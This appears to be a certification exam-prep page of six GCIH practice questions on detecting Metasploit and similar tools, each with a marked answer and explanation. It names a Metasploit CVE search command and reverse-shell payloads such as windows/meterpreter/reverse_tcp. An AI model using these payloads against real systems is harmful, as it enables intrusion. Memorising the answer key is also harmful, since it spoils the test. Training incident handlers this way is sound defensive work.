Free GCIH Detecting Exploitation Tools Practice Test 2026 — GIAC Incident Handler Questions

This free GCIH Detecting Exploitation Tools practice test covers detecting exploitation tools — identifying Metasploit, Cobalt Strike, Empire, Sliver, and other offensive frameworks via artifacts, signatures, and TLS fingerprints. Each question includes a detailed explanation — perfect for GIAC Certified Incident Handler / SANS SEC504 exam prep.

Key Topics in GCIH Detecting Exploitation Tools

6 Free GCIH Detecting Exploitation Tools Practice Questions with Answers

Sample Question 1 — Detecting Exploitation Tools

During an incident response investigation, you suspect that an attacker has used the Metasploit Framework to exploit a known vulnerability on a server. Which Metasploit command would you use to search for available exploits related to a specific CVE identifier?

  1. A. search cve:2021-1234 (Correct answer)
  2. B. exploit -c CVE-2021-1234
  3. C. find CVE-2021-1234
  4. D. lookup CVE-2021-1234

Correct answer: A

Explanation: The 'search cve:2021-1234' command in Metasploit Framework is used to search for modules related to a specific CVE identifier. This allows incident handlers to quickly identify potential exploits that may have been used by attackers. The other options are incorrect because they do not represent valid Metasploit commands for searching exploits by CVE.

Sample Question 2 — Detecting Exploitation Tools

You are investigating a server compromise and suspect that a payload was delivered using the Metasploit Framework. Upon analyzing the network traffic, you notice a significant amount of outbound connections to an unfamiliar IP address. Which Metasploit payload is known for creating a reverse TCP connection to the attacker's machine?

  1. A. windows/meterpreter/reverse_tcp (Correct answer)
  2. B. linux/x86/shell_reverse_tcp
  3. C. windows/shell_bind_tcp
  4. D. java/meterpreter/bind_tcp

Correct answer: A

Explanation: The 'windows/meterpreter/reverse_tcp' payload is designed to create a reverse TCP connection from the victim's machine to the attacker's machine. This allows the attacker to control the compromised system remotely. Option B is also a reverse TCP payload but is intended for Linux systems. Options C and D are bind TCP payloads, which wait for an incoming connection from the attacker, rather than initiating one.

Sample Question 3 — Detecting Exploitation Tools

During an incident response, you suspect that an attacker is using a known exploitation tool to scan your network. What is the first tool you should use to confirm this activity?

  1. A. Wireshark (Correct answer)
  2. B. Nmap
  3. C. Exiftool
  4. D. Metasploit

Correct answer: A

Explanation: Wireshark is a network protocol analyzer that allows you to capture and interactively browse the traffic running on a computer network. It is the best first step to confirm suspicious network activity, such as scanning, by analyzing the network packets. Nmap is a scanning tool itself, Exiftool is for metadata extraction, and Metasploit is a penetration testing framework, not suitable for initial detection.

Sample Question 4 — Detecting Exploitation Tools

An incident handler receives an alert about potential exploitation activity on a critical server. What is the most effective initial action to take to confirm the exploitation?

  1. A. Run a full vulnerability scan on the server.
  2. B. Check the server's event logs for unusual activity. (Correct answer)
  3. C. Disconnect the server from the network immediately.
  4. D. Initiate a full forensic analysis on the server.

Correct answer: B

Explanation: Checking the server's event logs for unusual activity is the most effective initial action. It provides immediate insights into potential exploitation without causing additional disruption or delay. Running a full vulnerability scan or initiating a forensic analysis is time-consuming and may not be necessary initially. Disconnecting the server should be considered only if the threat is confirmed and poses an immediate risk.

Sample Question 5 — Detecting Exploitation Tools

You are tasked with identifying if a specific exploitation tool is being used within your network. Which of the following methods is the most practical first step in your investigation?

  1. A. Perform a deep packet inspection on all network traffic.
  2. B. Review recent IDS/IPS alerts for signatures of known exploitation tools. (Correct answer)
  3. C. Conduct a full audit of all installed software on network devices.
  4. D. Run a behavioral analysis on all endpoint activities.

Correct answer: B

Explanation: Reviewing recent IDS/IPS alerts for signatures of known exploitation tools is the most practical first step. It leverages existing security systems to quickly identify suspicious activity. Deep packet inspection and full software audits are more resource-intensive and time-consuming. Behavioral analysis, while useful, is not the most immediate action to take.

Sample Question 6 — Detecting Exploitation Tools

An alert indicates potential exploitation of a web application. As a first responder, what is your priority to confirm the exploitation attempt?

  1. A. Capture a memory dump of the web server.
  2. B. Review web server access logs for suspicious entries. (Correct answer)
  3. C. Immediately patch the web application.
  4. D. Run a penetration test on the web application.

Correct answer: B

Explanation: Reviewing web server access logs for suspicious entries is the priority for confirming an exploitation attempt. It provides direct evidence of potential attacks without altering the server's state. Capturing a memory dump or patching should be considered after confirming the threat. Running a penetration test is not suitable as an immediate response measure.

About the GCIH Exam

Other GCIH Practice Domains

Start the free GCIH Detecting Exploitation Tools practice test now | 10-question quick start | All GCIH domains